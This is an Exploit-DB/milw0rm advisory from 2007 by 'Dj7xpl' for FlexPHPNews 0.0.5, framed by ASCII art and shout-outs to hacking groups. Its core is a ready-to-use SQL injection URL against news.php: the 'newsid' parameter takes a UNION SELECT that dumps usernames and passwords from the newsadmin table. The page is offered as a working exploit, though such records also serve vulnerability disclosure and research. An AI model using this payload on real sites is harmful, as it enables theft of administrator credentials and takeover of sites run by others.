FlexPHPNews 0.0.5 - 'newsid' SQL Injection

EDB-ID:

3631


Author:

Dj7xpl

Type:

webapps


Platform:

PHP

Date:

2007-04-01


                                                          .-""""""""-.                                 
                                                         /   Dj7xpl   \                              
                                                        |              |                                
                                                        |,  .-.  .-.  ,|                                
                                                        | )(_o/  \o_)( |                                     
                                                        |/     /\     \|                                 
                                              (@_       (_     ^^     _)                  
                                         _     ) \_______\__|IIIIII|__/_______________________________
                                        (_)@8@8{}<________|-\IIIIII/-|________________________________>
                                               )_/        \          / 
                                               (@
											   
+_______________________________________________Iranian Are The Best In World___________________________________________+
*
*
*       [~] Portal.......:    Flexphpnews version 0.0.5
*	[~] Download.....:    http://www.china-on-site.com/flexphpsite/other.php
*	[~] Author.......:    Dj7xpl  | Dj7xpl@yahoo.com
*	[~] Class........:    Remote SQL Injection Vulnerability
*
+_______________________________________________________________________________________________________________________+


+_______________________________________________________________________________________________________________________+
*
*
*       [~] Exploit......:     http://[Taget]/[Path]/news.php?newsid=999+union+select+0,username,password+from+newsadmin
*
+_______________________________________________________________________________________________________________________+


+_______________________________________________________________________________________________________________________+
*
*
*       [~] Sp Tnx.......:     Milw0rm, Ashiyane, Delta Hacking, Virangar, Hackerz.ir, Shabgard.org, Simorgh .........
*
+_______________________________________________________________________________________________________________________+

# milw0rm.com [2007-04-01]